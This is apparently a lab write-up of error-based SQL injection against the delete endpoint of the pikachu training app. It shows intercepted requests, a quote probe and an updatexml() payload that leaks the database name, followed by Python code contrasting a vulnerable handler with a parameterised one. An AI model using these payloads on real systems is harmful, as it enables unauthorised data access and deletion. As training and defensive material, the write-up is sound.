pikachu SQL injection: delete injection

Post a few entries in the message board.

A delete button appears next to each entry; click it.

Intercept the request with Burp Suite; the request looks like this:

GET /vul/sqli/sqli_del.php?id=57 HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.9:8080/vul/sqli/sqli_del.php
Cookie: security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1

The id=57 parameter looks like a possible injection point, so send the request to Repeater and modify it.

Append a single ' after 57 and click Send; the response confirms the guess:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

So this is an injection point.

Append the following after 57:
or updatexml(1, concat(0x7e, database()), 0)

Right-click the selected value of id, choose Convert selection, then URL, then URL-encode key characters; this URL-encodes the selected text:

GET /vul/sqli/sqli_del.php?id=57+or+updatexml(1,+concat(0x7e,+database()),+0) HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.9:8080/vul/sqli/sqli_del.php
Cookie: security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1

As you can see, every space has been replaced with +.

After clicking Send, the same trick as before (updatexml() rejects ~ as invalid XPath and echoes the string back in its error message) reveals the database name:

XPATH syntax error: '~pikachu'
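As an added defender's example (not code from the pikachu project or from this post), here is the same delete handler written both ways in Python, with an in-memory SQLite table standing in for the lab's message board. The table, the delete_* functions and the sample rows are assumptions made for this illustration. The vulnerable version concatenates the raw id value exactly as the lab does, so the ' probe and the updatexml() payload shown above turn into database errors that would reach the client; the hardened version checks the shape of id and binds it as a query parameter, so both inputs are rejected before any SQL is executed. SQLite has no updatexml(), so the error text differs from MySQL's, but the leak channel (a verbose database error in the HTTP response) is the same one the lab demonstrates.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the lab's message board (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE message (id INTEGER PRIMARY KEY, content TEXT)")
    conn.executemany(
        "INSERT INTO message (id, content) VALUES (?, ?)",
        [(56, "first"), (57, "second"), (58, "third")],
    )
    conn.commit()
    return conn


def delete_vulnerable(conn, raw_id):
    """Mirrors the flaw: the raw query-string value is concatenated into the SQL text."""
    sql = "DELETE FROM message WHERE id=" + raw_id
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def delete_hardened(conn, raw_id):
    """Two layers: validate the shape of id, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    # The value is passed as a bound parameter, never spliced into the statement.
    cur = conn.execute("DELETE FROM message WHERE id=?", (int(raw_id),))
    conn.commit()
    return cur.rowcount


def remaining_ids(conn):
    return [row[0] for row in conn.execute("SELECT id FROM message ORDER BY id")]


def run_probe(delete_fn, raw_id):
    """Run one request against a fresh database; return (outcome, ids still present)."""
    conn = make_db()
    try:
        n = delete_fn(conn, raw_id)
        outcome = f"deleted {n}"
    except sqlite3.Error as exc:
        # A database error string like this one is what the lab leaks to the client.
        outcome = "db error: " + str(exc)
    except ValueError as exc:
        outcome = "rejected: " + str(exc)
    return outcome, remaining_ids(conn)


def handle_delete_request(raw_id, log):
    """Hardened handler: generic reply to the client, detail only in the server log."""
    outcome, _ = run_probe(delete_hardened, raw_id)
    if outcome.startswith("deleted"):
        return "ok"
    log.append(f"delete rejected for id={raw_id!r}: {outcome}")
    return "invalid request"


if __name__ == "__main__":
    # The two inputs from the write-up, plus the legitimate one.
    for raw in ["57", "57'", "57 or updatexml(1, concat(0x7e, database()), 0)"]:
        print("vulnerable:", raw, "->", run_probe(delete_vulnerable, raw))
        print("hardened:  ", raw, "->", run_probe(delete_hardened, raw))
```

Running the block shows the legitimate id=57 removing exactly one row under both handlers, while the probe and the updatexml() payload produce a database error in the vulnerable handler and a "rejected" outcome (with all rows intact) in the hardened one. The regex check is a defence in depth on top of parameter binding, and handle_delete_request keeps the error detail in the server log so the response itself no longer serves as an oracle.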
posted @ 2022-10-29 16:37  明月照江江